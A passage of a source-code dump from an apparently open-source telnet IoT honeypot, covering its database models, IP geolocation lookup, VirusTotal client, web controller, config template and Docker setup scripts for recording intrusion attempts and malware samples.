Base.metadata, Column('id_conn', None, ForeignKey('conns.id'), primary_key=True, index=True), Column('id_url', None, ForeignKey('urls.id'), primary_key=True, index=True), ) # n to m relation connection <-> tag conns_tags = Table('conns_tags', Base.metadata, Column('id_conn', None, ForeignKey('conns.id'), primary_key=True, index=True), Column('id_tag', None, ForeignKey('tags.id'), primary_key=True, index=True), ) # n to m relationship connection <-> connection (associates) conns_conns = Table('conns_assocs', Base.metadata, Column('id_first', None, ForeignKey('conns.id'), primary_key=True, index=True), Column('id_last', None, ForeignKey('conns.id'), primary_key=True, index=True), ) class IPRange(Base): __tablename__ = "ipranges" ip_min = Column("ip_min", BigInteger, primary_key=True) ip_max = Column("ip_max", BigInteger, primary_key=True) cidr = Column("cidr", String(20), unique=True) country = Column("country", String(3)) region = Column("region", String(128)) city = Column("city", String(128)) zipcode = Column("zipcode", String(30)) timezone = Column("timezone", String(8)) latitude = Column("latitude", Float) longitude = Column("longitude", Float) asn_id = Column('asn', None, ForeignKey('asn.asn')) asn = relationship("ASN", back_populates="ipranges") class User(Base): __tablename__ = 'users' id = Column('id', Integer, primary_key=True) username = Column('username', String(32), unique=True, index=True) password = Column('password', String(64)) connections = relationship("Connection", back_populates="backend_user") def json(self, depth=0): return { "username": self.username } class Network(Base): __tablename__ = 'network' id = Column('id', Integer, primary_key=True) samples = relationship("Sample", back_populates="network") urls = relationship("Url", back_populates="network") connections = relationship("Connection", back_populates="network") nb_firstconns = Column('nb_firstconns', Integer, default=0) malware_id = Column('malware', None, ForeignKey('malware.id')) malware = relationship("Malware", back_populates="networks") def json(self, depth=0): return { "id": self.id, "samples": len(self.samples) if depth == 0 else map(lambda i: i.sha256, self.samples), "urls": len(self.urls) if depth == 0 else map(lambda i: i.url, self.urls), "connections": len(self.connections) if depth == 0 else map(lambda i: i.id, self.connections), "firstconns": self.nb_firstconns, "malware": self.malware.json(depth=0) } class Malware(Base): __tablename__ = 'malware' id = Column('id', Integer, primary_key=True) name = Column('name', String(32)) networks = relationship("Network", back_populates="malware") def json(self, depth=0): return { "id": self.id, "name": self.name, "networks": map(lambda i: i.id if depth == 0 else i.json(), self.networks) } class ASN(Base): __tablename__ = 'asn' asn = Column('asn', BigInteger, primary_key=True) name = Column('name', String(64)) reg = Column('reg', String(32)) country = Column('country', String(3)) urls = relationship("Url", back_populates="asn") connections = relationship("Connection", back_populates="asn") ipranges = relationship("IPRange", back_populates="asn") def json(self, depth=0): return { "asn": self.asn, "name": self.name, "reg": self.reg, "country": self.country, "urls": map(lambda url : url.url if depth == 0 else url.json(depth - 1), self.urls[:10]), "connections": None if depth == 0 else map(lambda connection : connection.json(depth - 1), self.connections[:10]) } class Sample(Base): __tablename__ = 'samples' id = Column('id', Integer, primary_key=True) sha256 = Column('sha256', String(64), unique=True, index=True) date = Column('date', Integer) name = Column('name', String(32)) file = Column('file', String(512)) length = Column('length', Integer) result = Column('result', String(32)) info = Column('info', Text()) urls = relationship("Url", back_populates="sample") network_id = Column('network', None, ForeignKey('network.id'), index=True) network = relationship("Network", back_populates="samples") def json(self, depth=0): return { "sha256": self.sha256, "date": self.date, "name": self.name, "length": self.length, "result": self.result, "info": self.info, "urls": len(self.urls) if depth == 0 else map(lambda url : url.json(depth - 1), self.urls), "network": self.network_id if depth == 0 else self.network.json() } class Connection(Base): __tablename__ = 'conns' id = Column('id', Integer, primary_key=True) ip = Column('ip', String(16)) date = Column('date', Integer, index=True) user = Column('user', String(16)) password = Column('pass', String(16)) connhash = Column('connhash', String(256), index=True) stream = Column('text_combined', Text()) asn_id = Column('asn', None, ForeignKey('asn.asn'), index=True) asn = relationship("ASN", back_populates="connections") backend_user_id = Column('backend_user_id', None, ForeignKey('users.id'), index=True) backend_user = relationship("User", back_populates="connections") ipblock = Column('ipblock', String(32)) country = Column('country', String(3)) city = Column('city', String(32)) lon = Column('lon', Float) lat = Column('lat', Float) urls = relationship("Url", secondary=conns_urls, back_populates="connections") tags = relationship("Tag", secondary=conns_tags, back_populates="connections") network_id = Column('network', None, ForeignKey('network.id'), index=True) network = relationship("Network", back_populates="connections") conns_before = relationship("Connection", secondary=conns_conns, back_populates="conns_after", primaryjoin=(conns_conns.c.id_last==id), secondaryjoin=(conns_conns.c.id_first==id)) conns_after = relationship("Connection", secondary=conns_conns, back_populates="conns_before", primaryjoin=(conns_conns.c.id_first==id), secondaryjoin=(conns_conns.c.id_last==id)) def json(self, depth=0): stream = None if depth > 0: try: stream = json.loads(self.stream) except: try: # Fix Truncated JSON ... s = self.stream[:self.stream.rfind("}")] + "}]" stream = json.loads(s) except: stream = [] return { "id": self.id, "ip": self.ip, "date": self.date, "user": self.user, "password": self.password, "connhash": self.connhash, "stream": stream, "network": self.network_id if depth == 0 else (self.network.json() if self.network != None else None), "asn": None if self.asn == None else self.asn.json(0), "ipblock": self.ipblock, "country": self.country, "city": self.city, "longitude": self.lon, "latitude": self.lat, "conns_before": map(lambda conn : conn.id if depth == 0 else conn.json(depth - 1), self.conns_before), "conns_after": map(lambda conn : conn.id if depth == 0 else conn.json(depth - 1), self.conns_after), "backend_user": self.backend_user.username, "urls": len(self.urls) if depth == 0 else map(lambda url : url.json(depth - 1), self.urls), "tags": len(self.tags) if depth == 0 else map(lambda tag : tag.json(depth - 1), self.tags), } Index('idx_conn_user_pwd', Connection.user, Connection.password) class Url(Base): __tablename__ = 'urls' id = Column('id', Integer, primary_key=True) url = Column('url', String(256), unique=True, index=True) date = Column('date', Integer) sample_id = Column('sample', None, ForeignKey('samples.id'), index=True) sample = relationship("Sample", back_populates="urls") network_id = Column('network', None, ForeignKey('network.id'), index=True) network = relationship("Network", back_populates="urls") connections = relationship("Connection", secondary=conns_urls, back_populates="urls") asn_id = Column('asn', None, ForeignKey('asn.asn')) asn = relationship("ASN", back_populates="urls") ip = Column('ip', String(32)) country = Column('country', String(3)) def json(self, depth=0): return { "url": self.url, "date": self.date, "sample": None if self.sample == None else (self.sample.sha256 if depth == 0 else self.sample.json(depth - 1)), "connections": len(self.connections) if depth == 0 else map(lambda connection : connection.json(depth - 1), self.connections), "asn": None if self.asn == None else (self.asn.asn if depth == 0 else self.asn.json(depth - 1)), "ip": self.ip, "country": self.country, "network": self.network_id if depth == 0 else self.network.json() } class Tag(Base): __tablename__ = 'tags' id = Column('id', Integer, primary_key=True) name = Column('name', String(32), unique=True) code = Column('code', String(256)) connections = relationship("Connection", secondary=conns_tags, back_populates="tags") def json(self, depth=0): return { "name": self.name, "code": self.code, "connections": None if depth == 0 else map(lambda connection : connection.json(depth - 1), self.connections) } samples = Sample.__table__ conns = Connection.__table__ urls = Url.__table__ tags = Tag.__table__ eng = None if is_sqlite: eng = sqlalchemy.create_engine(config.get("sql"), poolclass=QueuePool, pool_size=1, max_overflow=20, connect_args={'check_same_thread': False}) else: eng = sqlalchemy.create_engine(config.get("sql"), poolclass=QueuePool, pool_size=config.get("max_db_conn"), max_overflow=config.get("max_db_conn")) Base.metadata.create_all(eng) def get_db(): return DB(scoped_session(sessionmaker(bind=eng))) def delete_everything(): spare_tables = ["users", "asn", "ipranges"] eng.execute("SET FOREIGN_KEY_CHECKS=0;") for table in Base.metadata.tables.keys(): if table in spare_tables: continue sql_text = "DELETE FROM " + table + ";" print sql_text eng.execute(sql_text) eng.execute("SET FOREIGN_KEY_CHECKS=1;") class DB: def __init__(self, sess): self.sample_dir = config.get("sample_dir") self.limit_samples = 32 self.limit_urls = 32 self.limit_conns = 32 self.sess = sess def end(self): try: self.sess.commit() finally: self.sess.remove() # INPUT def put_sample_data(self, sha256, data): file = self.sample_dir + "/" + sha256 fp = open(file, "wb") fp.write(data) fp.close() self.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(file=file)) def put_sample_result(self, sha256, result): self.sess.execute(samples.update().where(samples.c.sha256 == sha256).values(result=result)) def put_url(self, url, date, url_ip, url_asn, url_country): ex_url = self.sess.execute(urls.select().where(urls.c.url == url)).fetchone() if ex_url: return ex_url["id"] else: return self.sess.execute(urls.insert().values(url=url, date=date, sample=None, ip=url_ip, asn=url_asn, country=url_country)).inserted_primary_key[0] def put_conn(self, ip, user, password, date, text_combined, asn, block, country, connhash): return self.sess.execute(conns.insert().values((None, ip, date, user, password, text_combined, asn, block, country))).inserted_primary_key[0] def put_sample(self, sha256, name, length, date, info, result): ex_sample = self.get_sample(sha256).fetchone() if ex_sample: return ex_sample["id"] else: return self.sess.execute(samples.insert().values(sha256=sha256, date=date, name=name, length=length, result=result, info=info)).inserted_primary_key[0] def link_conn_url(self, id_conn, id_url): self.sess.execute(conns_urls.insert().values(id_conn=id_conn, id_url=id_url)) def link_url_sample(self, id_url, id_sample): self.sess.execute(urls.update().where(urls.c.id == id_url).values(sample=id_sample)) def link_conn_tag(self, id_conn, id_tag): self.sess.execute(conns_tags.insert().values(id_conn=id_conn, id_tag=id_tag)) # OUTPUT def get_conn_count(self): q = """ SELECT COUNT(id) as count FROM conns """ return self.sess.execute(text(q)).fetchone()["count"] def get_sample_count(self): q = """ SELECT COUNT(id) as count FROM samples """ return self.sess.execute(text(q)).fetchone()["count"] def get_url_count(self): q = """ SELECT COUNT(id) as count FROM urls """ return self.sess.execute(text(q)).fetchone()["count"] def search_sample(self, q): q = "%" + q + "%" return self.sess.execute(samples.select().where(samples.c.name.like(q) | samples.c.result.like(q)).limit(self.limit_samples)) def search_url(self, q): search = "%" + q + "%" q = """ SELECT urls.url as url, urls.date as date, samples.sha256 as sample FROM urls LEFT JOIN samples on samples.id = urls.sample WHERE urls.url LIKE :search LIMIT :limit """ return self.sess.execute(text(q), {"search": search, "limit": self.limit_urls}) def get_url(self, url): q = """ SELECT urls.url as url, urls.date as date, samples.sha256 as sample, urls.id as id FROM urls LEFT JOIN samples on samples.id = urls.sample WHERE urls.url = :search """ return self.sess.execute(text(q), {"search": url}) def get_url_conns(self, id_url): q = """ SELECT conns.ip as ip, conns.user as user, conns.pass as password, conns.date as date FROM conns_urls LEFT JOIN conns on conns.id = conns_urls.id_conn WHERE conns_urls.id_url = :id_url ORDER BY conns.date DESC LIMIT :limit """ return self.sess.execute(text(q), {"id_url": id_url, "limit" : self.limit_samples}) def get_url_conns_count(self, id_url): q = """ SELECT COUNT(conns_urls.id_conn) as count FROM conns_urls WHERE conns_urls.id_url = :id_url """ return self.sess.execute(text(q), {"id_url": id_url}) def get_sample_stats(self, date_from = 0): date_from = 0 limit = self.limit_samples q = """ select samples.name as name, samples.sha256 as sha256, COUNT(samples.id) as count, MAX(conns.date) as lastseen, samples.length as length, samples.result as result from conns_urls INNER JOIN conns on conns_urls.id_conn = conns.id INNER JOIN urls on conns_urls.id_url = urls.id INNER JOIN samples on urls.sample = samples.id WHERE conns.date > :from GROUP BY samples.id ORDER BY count DESC LIMIT :limit""" return self.sess.execute(text(q), {"from": date_from, "limit": self.limit_samples}) def history_global(self, fromdate, todate, delta=3600): q = """ SELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour FROM conns WHERE conns.date >= :from AND conns.date <= :to GROUP BY hour """ return self.sess.execute(text(q), {"from": fromdate, "to": todate, "delta": delta}) def history_sample(self, id_sample, fromdate, todate, delta=3600): q = """ SELECT COUNT(conns.id) as count, :delta * cast((conns.date / :delta) as INTEGER) as hour FROM conns INNER JOIN conns_urls on conns_urls.id_conn = conns.id INNER JOIN urls on conns_urls.id_url = urls.id WHERE urls.sample = :id_sample AND conns.date >= :from AND conns.date <= :to GROUP BY hour ORDER BY hour ASC """ return self.sess.execute(text(q), {"from": fromdate, "to": todate, "delta": delta, "id_sample" : id_sample}) def get_samples(self): return self.sess.execute(samples.select().limit(self.limit_samples)) def get_sample(self, sha256): return self.sess.execute(samples.select().where(samples.c.sha256 == sha256)) print("DB Setup done") ================================================ FILE: backend/ipdb/.gitignore ================================================ *.CSV *.csv ================================================ FILE: backend/ipdb/__init__.py ================================================ ================================================ FILE: backend/ipdb/ipdb.py ================================================ import csv import ipaddress import struct import os def ipstr2int(ip): ip = unicode(ip) ip = ipaddress.IPv4Address(ip).packed ip = struct.unpack("!I", ip)[0] return ip class Entry: def __init__(self, start, end, value): self.start = int(start) self.end = int(end) self.value = value class IPTable: def __init__(self, fname): self.tzlist = [] iplocfile = os.path.join(os.path.dirname(__file__), fname) with open(iplocfile, "rb") as ipcsv: reader = csv.reader(ipcsv, delimiter=',', quotechar='"') for row in reader: e = Entry(row[0], row[1], row) self.tzlist.append(e) def find_i(self, ip, start, end): if end - start < 100: for i in range(start, end): obj = self.tzlist[i] if obj.start <= ip and ip <= obj.end: return obj.value return None else: mid = start + (end - start) / 2 val = self.tzlist[mid].start if ip < val: return self.find_i(ip, start, mid) elif ip > val: return self.find_i(ip, mid, end) else: return self.tzlist[mid].value def __iter__(self): return self.tzlist.__iter__() def find_int(self, ip): return self.find_i(ip, 0, len(self.tzlist) - 1) def find(self, ip): return self.find_i(ipstr2int(ip), 0, len(self.tzlist) - 1) def get_geo(): return IPTable("IP2LOCATION-LITE-DB11.CSV") def get_asn(): return IPTable("IP2LOCATION-LITE-ASN.CSV") def get_geo_iter(): iplocfile = os.path.join(os.path.dirname(__file__), "IP2LOCATION-LITE-DB11.CSV") fp = open(iplocfile, "rb") return csv.reader(fp, delimiter=',', quotechar='"') class IPDB: def __init__(self): self.geo = get_geo() self.asn = get_asn() def find(self, ip): geo = self.geo.find(ip) asn = self.asn.find(ip) if geo != None and asn != None: r = {} r["asn"] = int(asn[3]) r["ipblock"] = asn[2] r["country"] = geo[2] r["region"] = geo[4] r["city"] = geo[5] r["zip"] = geo[8] r["lon"] = float(geo[7]) r["lat"] = float(geo[6]) r["timezone"] = geo[9] return r else: return None if __name__ == "__main__": db = IPDB() print db.find("217.81.94.77") ================================================ FILE: backend/virustotal.py ================================================ import requests import time import db import Queue from util.config import config class QuotaExceededError(Exception): def __str__(self): return "QuotaExceededError: Virustotal API Quota Exceeded" class Virustotal: def __init__(self, key): self.api_key = key self.url = "https://www.virustotal.com/vtapi/v2/" self.user_agent = "Telnet Honeybot Backend" self.engines = ["DrWeb", "Kaspersky", "ESET-NOD32"] self.queue = Queue.Queue() self.timeout = 0 def req(self, method, url, files=None, params=None, headers=None): print "VT " + url r = None if method == "GET": r = requests.get(url, files=files, params=params, headers=headers) elif method == "POST": r = requests.post(url, files=files, params=params, headers=headers) else: raise ValueError("Unknown Method: " + str(method)) if r.status_code == 204: raise QuotaExceededError() else: return r def upload_file(self, f, fname): fp = open(f, 'rb') params = {'apikey': self.api_key} files = {'file': (fname, fp)} headers = { "User-Agent" : self.user_agent } res = self.req("POST", self.url + 'file/scan', files=files, params=params, headers=headers) json = res.json() fp.close() if json["response_code"] == 1: return json else: return None def query_hash_sha256(self, h): params = { 'apikey': self.api_key, 'resource': h } headers = { "User-Agent" : self.user_agent } res = self.req("GET", self.url + "file/report", params=params, headers=headers) json = res.json() if json["response_code"] == 1: return json else: return None def put_comment(self, obj, msg): res = None params = { 'apikey': self.api_key, 'resource': obj, "comment": msg } headers = { "User-Agent" : self.user_agent } res = self.req("GET", self.url + "comments/put", params=params, headers=headers) json = res.json() if json["response_code"] == 1: return json else: return None def get_best_result(self, r): if r["scans"]: for e in self.engines: if r["scans"][e] and r["scans"][e]["detected"]: return r["scans"][e]["result"] for e,x in r["scans"].iteritems(): if x["detected"]: return x["result"] return None else: return None ================================================ FILE: backend/virustotal_fill_db.py ================================================ import os from util.dbg import dbg from virustotal import Virustotal from sampledb import Sampledb vt = Virustotal() sdb = Sampledb() # Engines on vt providing good results engines = ["DrWeb", "Kaspersky", "ESET-NOD32"] def getName(r): if r["scans"]: for e in engines: if r["scans"][e] and r["scans"][e]["detected"]: return r["scans"][e]["result"] for e,x in r["scans"].iteritems(): if x["detected"]: return x["result"] return None else: return None #sdb.sql.execute('ALTER TABLE samples ADD COLUMN result TEXT') #sdb.sql.commit() for row in sdb.sql.execute('SELECT id, sha256 FROM samples WHERE result is NULL'): r = vt.query_hash_sha256(row[1]) res = str(getName(r)) print(row[1] + ": " + res) sdb.sql.execute('UPDATE samples SET result = ? WHERE id = ?', (res, row[0])) sdb.sql.commit() ================================================ FILE: backend/webcontroller.py ================================================ import os import hashlib import traceback import struct import json import time import math import additionalinfo import ipdb.ipdb from sqlalchemy import desc, func, and_, or_, not_ from functools import wraps from simpleeval import simple_eval from argon2 import argon2_hash from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper, conns_conns from virustotal import Virustotal from cuckoo import Cuckoo from util.dbg import dbg from util.config import config from difflib import ndiff class WebController: def __init__(self): self.session = None @db_wrapper def get_connection(self, id): connection = self.session.query(Connection).filter(Connection.id == id).first() if connection: return connection.json(depth=1) else: return None @db_wrapper def get_connections(self, filter_obj={}, older_than=None): query = self.session.query(Connection).filter_by(**filter_obj) if older_than: query = query.filter(Connection.date < older_than) query = query.order_by(desc(Connection.date)) connections = query.limit(32).all() return map(lambda connection : connection.json(), connections) @db_wrapper def get_connections_fast(self): conns = self.session.query(Connection).all() clist = [] for conn in conns: clist.append({ "id": conn.id, "ip": conn.ip, "conns_before": map(lambda c: c.id, conn.conns_before), "conns_after": map(lambda c: c.id, conn.conns_after) }) return clist ## @db_wrapper def get_networks(self): networks = self.session.query(Network).all() ret = [] for network in networks: if len(network.samples) > 0 and network.nb_firstconns >= 10: n = network.json(depth = 0) # ips = set() # for connection in network.connections: # ips.add(connection.ip) # n["ips"] = list(ips) ret.append(n) return ret @db_wrapper def get_network(self, net_id): network = self.session.query(Network).filter(Network.id == net_id).first() ret = network.json() honeypots = {} initialconnections = filter(lambda connection: len(connection.conns_before) == 0, network.connections) ret["connectiontimes"] = map(lambda connection: connection.date, initialconnections) has_infected = set([]) for connection in network.connections: if connection.backend_user.username in honeypots: honeypots[connection.backend_user.username] += 1 else: honeypots[connection.backend_user.username] = 1 for connection_before in connection.conns_before: if connection.ip != connection_before.ip: has_infected.add(("i:" + connection.ip, "i:" + connection_before.ip)) for url in connection.urls: has_infected.add(("u:" + url.url, "i:" + connection.ip)) if url.sample: has_infected.add(("s:" + url.sample.sha256, "u:" + url.url)) ret["has_infected"] = list(has_infected) ret["honeypots"] = honeypots return ret @db_wrapper def get_network_history(self, not_before, not_after, network_id): granularity = float(3600 * 24) # 1 day timespan = float(not_after - not_before) if timespan < 3600 * 24 * 2: granularity = float(3600) * 2 conns = self.session.query(Connection.date) conns = conns.filter(Connection.network_id == network_id) conns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after)) # Filter out subsequent connections conns = conns.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last) conns = conns.filter(conns_conns.c.id_last == None) ret = [0] * int(math.ceil(timespan / granularity)) for i in range(len(ret)): ret[i] = [ not_before + i * granularity, 0 ] for date in conns.all(): i = int((date[0] - not_before) / granularity) ret[i][1] += 1 return ret @db_wrapper def get_biggest_networks_history(self, not_before, not_after): MAX_NETWORKS = 4 n = self.session.query(Connection.network_id, func.count(Connection.network_id)) n = n.filter(and_(not_before < Connection.date, Connection.date < not_after)) # Filter out subsequent connections n = n.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last) n = n.filter(conns_conns.c.id_last == None) n = n.group_by(Connection.network_id) n = n.order_by(func.count(Connection.network_id).desc()) data = n.all() nb_networks = min(MAX_NETWORKS, len(data)) r = [0] * nb_networks i = 0 for net in data[:nb_networks]: network = self.session.query(Network).filter(Network.id == net[0]).first() if (network != None): r[i] = { "network": network.json(), "data": self.get_network_history(not_before, not_after, network.id) } i += 1 return r @db_wrapper def get_connection_locations(self, not_before, not_after, network_id = None): conns = self.session.query(Connection.lat, Connection.lon) conns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after)) if network_id: conns = conns.filter(Connection.network_id == network_id) conns = conns.all() return conns ## @db_wrapper def get_malwares(self): malwares = self.session.query(Malware).all() return map(lambda m: m.json(), malwares) ## @db_wrapper def get_sample(self, sha256): sample = self.session.query(Sample).filter(Sample.sha256 == sha256).first() return sample.json(depth=1) if sample else None @db_wrapper def get_newest_samples(self): samples = self.session.query(Sample).order_by(desc(Sample.date)).limit(16).all() return map(lambda sample : sample.json(), samples) ## @db_wrapper def get_url(self, url): url_obj = self.session.query(Url).filter(Url.url == url).first() return url_obj.json(depth=1) if url_obj else None @db_wrapper def get_newest_urls(self): urls = self.session.query(Url).order_by(desc(Url.date)).limit(16).all() return map(lambda url : url.json(), urls) ## @db_wrapper def get_tag(self, name): tag = self.session.query(Tag).filter(Tag.name == name).first() return tag.json(depth=1) if tag else None @db_wrapper def get_tags(self): tags = self.session.query(Tag).all() return map(lambda tag : tag.json(), tags) ## @db_wrapper def get_country_stats(self): stats = self.session.query(func.count(Connection.country), Connection.country).group_by(Connection.country).all() return stats ## @db_wrapper def get_asn(self, asn): asn_obj = self.session.query(ASN).filter(ASN.asn == asn).first() if asn_obj: return asn_obj.json(depth=1) else: return None ## @db_wrapper def connhash_tree_lines(self, lines, mincount): length = 1 + lines * 4 othercount = 0 ret = {} dbres = self.session.query(func.count(Connection.id), func.substr(Connection.connhash, 0, length).label("c"), Connection.stream, Connection.id).group_by("c").all() for c in dbres: count = c[0] connhash = c[1] if count > mincount: ev_in = filter(lambda ev : ev["in"], json.loads(c[2])) if len(ev_in) >= lines: ret[connhash] = { "count": c[0], "connhash": connhash, "text": ev_in[lines-1]["data"], "childs": [], "sample_id": c[3] } else: othercount += count return ret @db_wrapper def connhash_tree(self, layers): tree = self.connhash_tree_lines(1, 10) layer = tree for lines in range(2,layers+1): length = (lines-1) * 4 new_layer = self.connhash_tree_lines(lines, 0) for connhash in new_layer: connhash_old = connhash[:length] if connhash_old in layer: parent = layer[connhash_old] parent["childs"].append(new_layer[connhash]) layer = new_layer return tree ================================================ FILE: backend.py ================================================ import sys import json import traceback from util.config import config if len(sys.argv) > 1 and sys.argv[1] == "cleardb": print "This will DELETE ALL DATA except users and cached asn data" print "from the database currently used at:" print "" print " " + config.get("sql") print "" print "If you really want to DELETE ALL DATA, type 'delete' and press enter." print "" doit = sys.stdin.readline() print "" if doit.strip() != "delete": print "ABORTED" sys.exit(0) from backend.db import delete_everything delete_everything() sys.exit(0) # Import from backend is faster: # Benchmark: # CPU: Intel(R) Core(TM) i5-6500 CPU @ 3.20GHz # Storage: Samsung SSD PM961 # File size: 7,3M # SQLite: # honeypot: 0m26,056s # backend: 0m21,445s # Mariadb: # honeypot: 0m32,684s # backend: 0m14,849s if len(sys.argv) > 2 and sys.argv[1] == "import": from backend.clientcontroller import ClientController fname = sys.argv[2] if len(sys.argv) > 3: username = sys.argv[3] else: username = config.get("backend_user") print "Importing " + fname + " as user " + username with open(fname, "rb") as fp: ctrl = ClientController() for line in fp: line = line.strip() obj = json.loads(line) if obj["ip"] != None and obj["date"] >= 1515899912: print "conn " + obj["ip"] + " date " + str(obj["date"]) obj["backend_username"] = username try: ctrl.put_session(obj) except: print "Cannot Put Session" print "----------------------------" traceback.print_exc() print "----------------------------" print repr(obj) sys.exit(0) sys.exit(0) if len(sys.argv) > 1: print "Unknown action '" + sys.argv[1] + "'" print "Available commands:" print " import file.json : imports raw og file" print " cleardb : deletes all data from db" print "To simply start the backend, use no command at all" sys.exit(0) from backend.backend import run run() ================================================ FILE: config.dist.yaml ================================================ # This is the default (distribution) config file # For local configuration, please create and edit the file "config.yaml", # this ensures your configuration to endure a update using git pull # this file is in YAML format # If you don't know YAML, check https://de.wikipedia.org/wiki/YAML # or just copy around existing entries ############################################# # Global config # used by both honeypot AND backend # Credentials for authetification # Used by honeypot only # If not set, will be randomly generated # If the backend cannot find a user with id == 1 in its database, # it will generate one using this credentials (or the ones autogenerated) # backend_user: "CHANGEME" # backend_pass: "CHANGEME" ############################################## # Honeypot configuration # Backend URL to which honeypot will connect to to store data backend: "http://localhost:5000" # Write raw data to logfile, can be imported into backend db later # does include everything EXCEPT sample contents log_raw: null # Save samples in sample_dir log_samples: False # Do not download any samples, use their url as content # useful for debugging fake_dl: false # Telnet port telnet_addr: "" telnet_port: 2323 # Timeout in seconds for telnet session. Will expire if no bytes can be read from socket. telnet_session_timeout: 60 # Maximum session length in seconds. telnet_max_session_length: 120 # Minimum time between 2 connection from the same ip, if closer together # they will be refused telnet_ip_min_time_between_connections: 30 ############################################# # Backend configuration # sqlalchemy sql connect string # examples: # using sqlite: "sqlite:///database.db" # using mysql: ""mysql+mysqldb://USER:PASSWORD@MYSQL_HOST/DATABASE_NAME"," sql: "sqlite:///database.db" # IP Address and port for http interface http_port: 5000 http_addr: "127.0.0.1" # Max connections to sql db, maybe restricted in some scenarios max_db_conn: 1 # Directory in which samples are stored sample_dir: "samples" # Virustotal API key vt_key: "GET_YOUR_OWN" submit_to_vt: false # Enable or Disable IP to ASN resolution # Options: "none" | "offline" | "online" # offline works by importing data from https://lite.ip2location.com/ - dowload must be done manually # online works by querying origin.asn.cymru.com ip_to_asn_resolution: "online" cuckoo_enabled: false, cuckoo_url_base: "http://127.0.0.1:8090" cuckoo_user: "user" cuckoo_passwd: "passwd" cuckoo_force: 0 ================================================ FILE: create_config.sh ================================================ #!/bin/bash if [ -f config.yaml ]; then echo "config.yaml already exists, aborting" exit fi user=admin pass=$(openssl rand -hex 16) salt=$(openssl rand -hex 16) echo "backend_user: $user" >> config.yaml echo "backend_pass: $pass" >> config.yaml echo "backend_salt: $salt" >> config.yaml ================================================ FILE: create_docker.sh ================================================ #!/bin/bash if [ -f config.yaml ]; then echo -n "config.yaml already exists, delete it? (Y/n): " read force if [ "$force" = "Y" ] || [ "$force" = "y" ] || [ "$force" = "" ]; then rm config.yaml else echo aborting... exit 1 fi fi if [ -f docker-compose.yml ]; then echo -n "docker-compose.yml already exists, delete it? (Y/n): " read force if [ "$force" = "Y" ] || [ "$force" = "y" ] || [ "$force" = "" ]; then rm docker-compose.yml else echo aborting... exit 1 fi fi echo -n "DB: Use maria or sqlite? (maria/sqlite): " read dbbackend if [ "$dbbackend" != "maria" ] && [ "$dbbackend" != "sqlite" ]; then echo "$dbbackend is not valid" exit 1 fi # Honeypot setup echo " - Writing honeypot config" user=admin pass=$(openssl rand -hex 16) salt=$(openssl rand -hex 16) echo "backend_user: $user" >> config.yaml echo "backend_pass: $pass" >> config.yaml echo "backend_salt: $salt" >> config.yaml echo "http_addr: \"0.0.0.0\"" >> config.yaml echo "telnet_addr: \"0.0.0.0\"" >> config.yaml echo "backend: \"http://backend:5000\"" >> config.yaml echo "log_samples: True" >> config.yaml echo "sample_dir: samples" >> config.yaml # DB setup if [ "$dbbackend" = "maria" ]; then dbpass=$(openssl rand -hex 16) sql="mysql+mysqldb://honey:$dbpass@honeydb/honey" echo sql: \"$sql\" >> config.yaml fi # docker-compose setup echo " - Writing docker-compose.yml" cat << EOF >> docker-compose.yml version: "3.7" services: honeypot: depends_on: - backend image: telnet-iot-honeypot:hot restart: always entrypoint: - python - honeypot.py ports: - "2323:2323" volumes: - "./samples:/usr/src/app/samples" backend: build: . image: telnet-iot-honeypot:hot restart: always entrypoint: - python - backend.py ports: - "5000:5000" volumes: - "./samples:/usr/src/app/samples" EOF if [ "$dbbackend" = "maria" ]; then cat << EOF >> docker-compose.yml depends_on: - honeydb honeydb: image: mariadb:latest restart: always environment: MYSQL_RANDOM_ROOT_PASSWORD: "yes" MYSQL_DATABASE: honey MYSQL_USER: honey MYSQL_PASSWORD: $dbpass EOF fi echo -n "Start honeypot using docker-compose now? d = start using daemon flag (Y/n/d): " read runit if [ "$runit" = "d" ]; then sudo docker-compose up -d elif [ "$runit" = "Y" ] || [ "$runit" = "y" ] || [ "$runit" = "" ]; then sudo docker-compose up fi ================================================ FILE: honeypot/__init__.py ================================================ ================================================ FILE: honeypot/__main__.py ================================================ import signal from telnet import Telnetd from util.dbg import dbg def signal_handler(signal, frame): dbg('Ctrl+C') srv.stop() signal.signal(signal.SIGINT, signal_handler) srv = Telnetd(2222) srv.run() ================================================ FILE: honeypot/client.py ================================================ import requests import requests.exceptions import requests.auth import json from util.dbg import dbg from util.config import config class Client: def __init__(self): self.user = config.get("backend_user") self.password = config.get("backend_pass") self.url = config.get("backend") self.auth = requests.auth.HTTPBasicAuth(self.user, self.password) self.test_login() def test_login(self): try: r = requests.get(self.url + "/connections", auth=self.auth, timeout=20.0) except: raise IOError("Cannot connect to backend") try: r = requests.get(self.url + "/login", auth=self.auth, timeout=20.0) if r.status_code != 200: raise IOError() except: raise IOError("Backend authentification test failed, check config.json") def put_session(self, session, retry=True): try: r = requests.put(self.url + "/conns", auth=self.auth, json=session, timeout=20.0) except requests.exceptions.RequestException: dbg("Cannot connect to backend") return [] if r.status_code == 200: return r.json() elif retry: msg = r.raw.read() dbg("Backend upload failed, retrying (" + str(msg) + ")") return self.put_session(session, False) else: msg = r.raw.read() raise IOError(msg) def put_sample(self, data, retry=True): try: r = requests.post(self.url + "/file", auth=self.auth, data=data, timeout=20.0) except requests.exceptions.RequestException: dbg("Cannot connect to backend") return if r.status_code == 200: return elif retry: msg = r.raw.read() dbg("Backend upload failed, retrying (" + str(msg) + ")") return self.put_sample(sha256, filename, False) else: msg = r.raw.read() raise IOError(msg) ================================================ FILE: honeypot/sampledb_client.py ================================================ import client import time import traceback import os import requests import hashlib import json from util.dbg import dbg from util.config import config BACKEND = None def get_backend(): global BACKEND if BACKEND != None: return BACKEND elif config.get("backend", optional=True) != None: BACKEND = client.Client() return BACKEND else: return None def sha256(data): h = hashlib.sha256() h.update(data) return h.hexdigest() class SampleRecord: def __init__(self, url, name, info, data): self.url = url self.name = name self.date = int(time.time()) self.info = info self.data = data if data: self.sha256 = sha256(data) self.length = len(data) else: self.sha256 = None self.length = None def json(self): return { "type": "sample", "url": self.url, "name": self.name, "date": self.date, "sha256": self.sha256, "info": self.info, "length": self.length } class SessionRecord: def 